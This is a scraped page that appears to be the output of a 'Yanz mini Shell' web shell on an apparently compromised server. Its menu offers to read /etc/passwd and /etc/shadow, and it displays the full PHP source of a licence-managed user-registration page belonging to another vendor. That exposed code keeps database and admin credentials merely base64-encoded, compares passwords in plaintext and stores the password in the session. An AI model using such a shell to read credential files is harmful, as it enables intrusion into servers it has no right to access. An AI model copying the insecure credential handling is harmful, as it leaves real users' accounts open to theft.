Yanz mini Shell

Action

[*] New File
[*] New Folder

Sensitive File

[*] /etc/passwd
[*] /etc/shadow
[*] /etc/resolv.conf

<?php 
$path="admin/orna/";
if (file_exists($path."duf") AND file_exists($path."dpf") AND file_exists($path."dnf")) {
//user
$user_enc = fread(fopen($path."duf", "r"), filesize($path."duf"));
$MySQL_username = base64_decode($user_enc);
//pass
$pass_enc = fread(fopen($path."dpf", "r"), filesize($path."dpf"));
$MySQL_password = base64_decode($pass_enc);
//DB Name
$dbn_enc = fread(fopen($path."dnf", "r"), filesize($path."dnf"));
$MySQL_database = base64_decode($dbn_enc);
$MySQL_host= 'localhost';
if (!($connection = @mysql_connect($MySQL_host, $MySQL_username, $MySQL_password)))
die('(Error-00DUP-E-ORNA) There is some problem in the Database server, please try again later or contact at error@ornamentsolutions.com');
if (!@mysql_select_db($MySQL_database, $connection))
die('There is some problem in the server, please come back later.. or contact www.ornamentsolutions.com for support. ERROR : DBN/A');}
else{
die("<h1>License not installed (Unactivated license version).</h1>");}

if (file_exists("admin/orna/adu") AND file_exists("admin/orna/adp") AND file_exists("admin/orna/nou")) {

$sql_nou="select count(id) from `".$MySQL_database."`.users";
$nou_exist=mysqli_fetch_assoc(mysqli_query($connection,$sql_nou));

$adusr = fread(fopen("admin/orna/adu", "r"), filesize("admin/orna/adu"));
$ad_usr = base64_decode($adusr);

$adpass = fread(fopen("admin/orna/adp", "r"), filesize("admin/orna/adp"));
$ad_pass = base64_decode($adpass);

$nou = fread(fopen("admin/orna/nou", "r"), filesize("admin/orna/nou"));
$no_usr = base64_decode($nou);
if($no_usr<=$nou_exist['count(id)']){
die("<h1>Access denied! You have reached the maximum number of permitted users.</h1>Upgrade your licence and try again.<br>
Your have created ".$nou_exist['count(id)']." Out of ". $no_usr." users.");
}
}
else{
die("<center><h1>'Administrator' does not exist!</h1>
The security system (license manager) is not functioning or is not properly installed.<br>
Unable to initialize user manager.<br><br>
<strong>This error is may be because of following causes</strong><br>
The Licensing services are disabled<br>
Unauthorized mofification in program structure/source/trusted storage files.<br>
Your licence is not yet installed.<br>
License installation / Validation is may be inturepted.<br>
The registry is manipulated to change the license method.<br>
The Trusted Storage files are corrupted.</center>");
}

if((isset($_POST['usrnm'])) AND (isset($_POST['pass']))){
if(($_POST['usrnm']==$ad_usr) AND ($_POST['pass']==$ad_pass)){
session_start();
$_SESSION['cu_token']=$_POST['usrnm'];
// Register $myusername, $mypassword and redirect to file "menu"
$_SESSION['cu_user']=$_POST['usrnm']; // for new version
$_SESSION['cu_pass']=$_POST['pass']; // for new version
}
else{
$msg="You have entered an Invalid Username or password!";}
}
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
    <title>Create new User</title>
    
    <link href="assets/css/bootstrap.css" rel="stylesheet">
    
    <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" />
    
    <link href="assets/css/style.css" rel="stylesheet">
    <link href="assets/css/style-responsive.css" rel="stylesheet">
    
    
  </head>
  <body>      
  
          <section style="padding:10px 50px"; >
<img src="assets/img/logo.png">
<h4>User Registration. V 1.0D</h4>
          <div class="row">

 <?php
if(isset($_SESSION['cu_user'])){
 print "
 <div class=\"form-panel\" >
<form style=\"padding:10px 30px\" id=\"form\" class=\"style-form form-horizontal\" enctype=\"multipart/form-data\" action=\"\" method=\"POST\" >
<div class=\"row\">
<h3>User Details.</h3>
<div class=\"form-group\">

<div class=\"col-sm-3\">
  Company Name:
<input type=\"text\" name=\"name\" class=\"form-control\" minlength=\"3\"  placeholder=\"User Name\" required>
  </div>
  
  <div class=\"col-sm-3\">
  User Password:
<input type=\"password\" name=\"password\" id=\"password\" class=\"form-control\"  placeholder=\"Password\" required>
  </div>
  
  <div class=\"col-sm-3\">
  Confirm Password:
<input type=\"password\" name=\"c_password\" id=\"cn_password\" class=\"form-control\"  placeholder=\"Confirm Password\" required>
  </div>
  
  <div class=\"col-sm-3\">
  Upload Profile Picture:
<input name=\"files_1\" type=\"file\" class=\"form-control\" placeholder=\"DP\" accept=\"image/*\"  required>
  </div>
  
  <div class=\"col-sm-3\">
  Email:
<input type=\"email\" name=\"eml\" class=\"form-control\"  placeholder=\"Email Address\" required>
  </div>
  
  <div class=\"col-sm-3\">
  Landline:
<input type=\"text\" name=\"lline\" class=\"form-control\"  placeholder=\"Landline\" required>
  </div>
  
  <div class=\"col-sm-3\">
  Cell:
<input type=\"text\" name=\"cell\" class=\"form-control\"  placeholder=\"Cell/Mobile\" required>
  </div>
  
  <div class=\"col-sm-3\">
  CNIC:
<input type=\"text\" name=\"cnic\" class=\"form-control\"  placeholder=\"CNIC\" required>
  </div>
 
 <div class=\"col-sm-12\" style=\"padding:20px 0;\">
<center>
<button type=\"submit\" id=\"lky_btn\" class=\"btn btn-theme\">Create User</button>
</center>
  </div>
 
</div>
</div>
</form>
</div>";}

else{print"
<center>
<div class=\"col-sm-4\" ></div>
<div class=\"form-panel col-sm-4\" >
<form style=\"padding:10px 30px\" id=\"form_lgn\" class=\"style-form\" action=\"cu.php\" method=\"POST\" >
<div class=\"row\">
<h3><i class=\"fa fa-exclamation-triangle\"></i> Administrator Login is Required!</h3>
<span>Only Administrator can create new user.</span>
<div class=\"form-group\" style=\"padding-top:15px\">
  <div class=\"col-sm-12\">
  <i class=\"fa fa-user\"></i> User Name:
<input type=\"text\" name=\"usrnm\" class=\"form-control\"  placeholder=\"User Name\" required>
  </div>
  <div class=\"col-sm-12\" style=\"padding-top:10px;\">
  <i class=\"fa fa-key\"></i> Password:
<input type=\"password\" name=\"pass\" class=\"form-control\"  placeholder=\"Password\" required>
<span>";echo @$msg; print"</span>
  </div>
  <div class=\"col-sm-12\" style=\"padding:20px 0;\">
<button type=\"submit\" id=\"lgn_btn\" class=\"btn btn-theme\">Login</button>
  </div>
  <span>Note: You can only create Maxium "; echo $no_usr; print " users depending upon your license.</span>
</div>
</div>
</form>
</div>
<div class=\"col-sm-4\" ></div>
</center>";}

?>
</div>
</section>
      
      <footer class="site-footer"> 
          <div class="text-center">
              Licence Generation - A Product of ProFinance.
              <a href="#" class="go-top">
                  <i class="fa fa-angle-up"></i>
              </a>
          </div>
      </footer>
      
  </section>
    
    <script src="assets/js/jquery.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
    <script src="assets/js/jquery-ui-1.9.2.custom.min.js"></script>
    <script src="assets/js/jquery.ui.touch-punch.min.js"></script>
    <script src="assets/js/jquery.scrollTo.min.js"></script>
    <script src="assets/js/jquery.nicescroll.js" type="text/javascript"></script>
    
    <script src="assets/js/common-scripts-old.js"></script>
<script type="text/javascript">
$("#form").submit(function(){
if($('#password').val()==$('#cn_password').val()){
var formData = new FormData($(this)[0]);
$.ajax({
url: 'admin/ajax/php/sv.php?t_name1=users&count=1&file=true&flimit=1&row=single',
type: 'POST',
data: formData,
async: false,
success: function (data) {
if(data=="Saved."){
data="<h4>User Successfully Created.</h4> <br> <a href=\"index.php\">Login Now</a>"};
$('#form').hide('fast');
$('.form-panel').html(data);
},
cache: false,
contentType: false,
processData: false
});
return false;}
else{
alert('Password Not Matched! Retype Carefully.');
$('#password').focus();
return false;}
});
</script>
  </body>
</html>